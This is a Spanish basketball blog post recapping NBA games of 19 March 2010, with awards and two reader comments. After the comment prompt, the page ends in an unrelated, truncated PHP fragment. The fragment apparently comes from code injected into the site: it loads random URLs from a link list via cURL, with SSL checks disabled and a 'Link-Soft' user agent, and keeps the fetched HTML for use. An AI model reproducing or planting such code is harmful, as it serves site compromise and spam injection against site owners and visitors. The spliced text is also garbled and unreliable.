La crónica (19/03/2010)

20 de March de 2010 por TheDeerHunter

Mucha tela que cortar. Pocas sorpresas, pero mucha emoción y asuntos noticiosos.

El partido más emocionante de la noche, por aquello de la lucha por playoffs, fue el Charlotte@Atlanta. Volvía Stephen Jackson pero lo hizo desde el banquillo. La estrella del equipo fue Raimon Felton anoche, que colocó a su equipo por delante con un triplazo imposible a falta de 3 segundos para el final de la prórroga. Ese tiempo es un mundo en este deporte, más si está un tal Joe Johnson en la cancha. No había estado fino en el partido el bueno de Joe, pero el talento no entiende de rachas. Tuvo tiempo para recibir casi en la línea de medio campo, progresar hasta un paso más allá de la línea de tres y resolver con dos defensores encima. Dificilísima.

También pudimos disfrutar de uno de esos partidos geniales de Jennings. Cara a cara contra Tyreke Evans y el ex de la Lottomatica se destapa con 8 triples y 8 asistencias en un duelo que se resolvió a dos prórrogas. Estuvo sublime, pero hay que destacar nuevamente la actuación de Bogut, la de John Salmons incluyendo un canastón contra tabla para asegurar el partido y también la de Ilyasova que fue quien forzó la prórroga con otro triple maravilloso. Por cierto, Jennings estuvo a punto de ganar el partido con una canasta desde su campo en el último segundo de la primera prórroga. Hubiera sido la bomba, nunca mejor dicho.

Los Blazers también ganaron de la mano de un clutch impresionante de Roy. Fue lo único que mereció la pena de un bodrio de partido. 76-74 frente a los Wizards. Seguro que a McMillan le encantó el espectáculo.

LeBron volvió a ejercer de hombre orquesta contra los Bulls. Es el jugador más joven que alcanza los 15.000 puntos en la liga. Los Celtics sufrieron para ganar a los Rockets, pero lo hizo recuperando el mejor juego de su Big Three.

Los Lakers ganaron a los Wolves, pero pierden a Andrew Bynum por una lesión en el tendón de Aquiles pendiente de evaluar. Siendo Bynum y a tiro de Playoffs no pueden ser excesivamente optimistas.

Palizón de los Spurs a los Warriors. Los “guerrillerillos” no sólo consiguen hacer buenos a gente de la D-League que juega con ellos… sino también al fondo de banquillo de los equipos rivales. Entre Bonner, Garret Temple, Malik Hairston e Ian Mahinmi sumaron 51 puntos de los casi 150 que anotó su equipo.

Palizón también de los Thunder a Toronto. Los chavales de Oklahoma no quisieron hacer sangre y levantaron el pie del acelerador. Gracias a ello los Raptors maquillaron un resultado que era bochornoso al descanso.

Finalmente los Pacers ganaron a los Pistons (con el feliz regreso a las canchas de Stuckey) y los Knicks a los Sixers. Stodemire estuvo sensacional en la victoria sobre lo Jazz.

PREMIOS

MVP: Amare Stoudemire, 44 puntos 7 rebotes contra la dura defensa de los Jazz.

El rookie: Brandon Jennings, 35 puntos, 5 rebotes, 8 asistencias, mojándole bien la cara al mismísimo Tyreke Evans.

La sorpresa: Lamar Odom acostumbra a crecerse cuando se lesiona Bynum. La sorpresa no es que hiciera un gran partido, sino que anotara 4 de 6 en triples.

La decepción: Sí, la lesión de Bynum puede ser decisiva para el devenir de la campaña.

El mayor esfuerzon en vano: Monta Ellis, 39 puntos 4 rebotes 4 asistencias… pero su equipo es una banda.

Comenta

2 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Joder, el el buzzer beater de Roy soy el único que ve unos pasos clarísimos????
    Impresionante el taponazo de Tolliver a George Hill, para mí una de las jugadas del año.
    Por cierto, la temporada de Felton no está siendo nada del otro mundo, por eso me sorprende muchísimo que sea por detras de Nowitzki el que lidere la clasificacón del Clutch Time.

      Citar

  2. Love Denise dice:
    #2

    que mala suerte tiene Bynum que siempre se lesiona en la 2º mitad de temporada. Sin Bynum, y por ende, con Odom de titular, los Lakers son entonces el equipo con peor banquillo de la NBA.
    147 puntos de Spurs¡¡¡¡¡, los Warriors son un auténtico circo, y D.Nelson que se deje ya de hacer tonterías y quintetos raros con sus equipos.
    Alguien sabe si perder 3 balones y cometer 4 faltas personales en 9 minutos es un record en la NBA?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>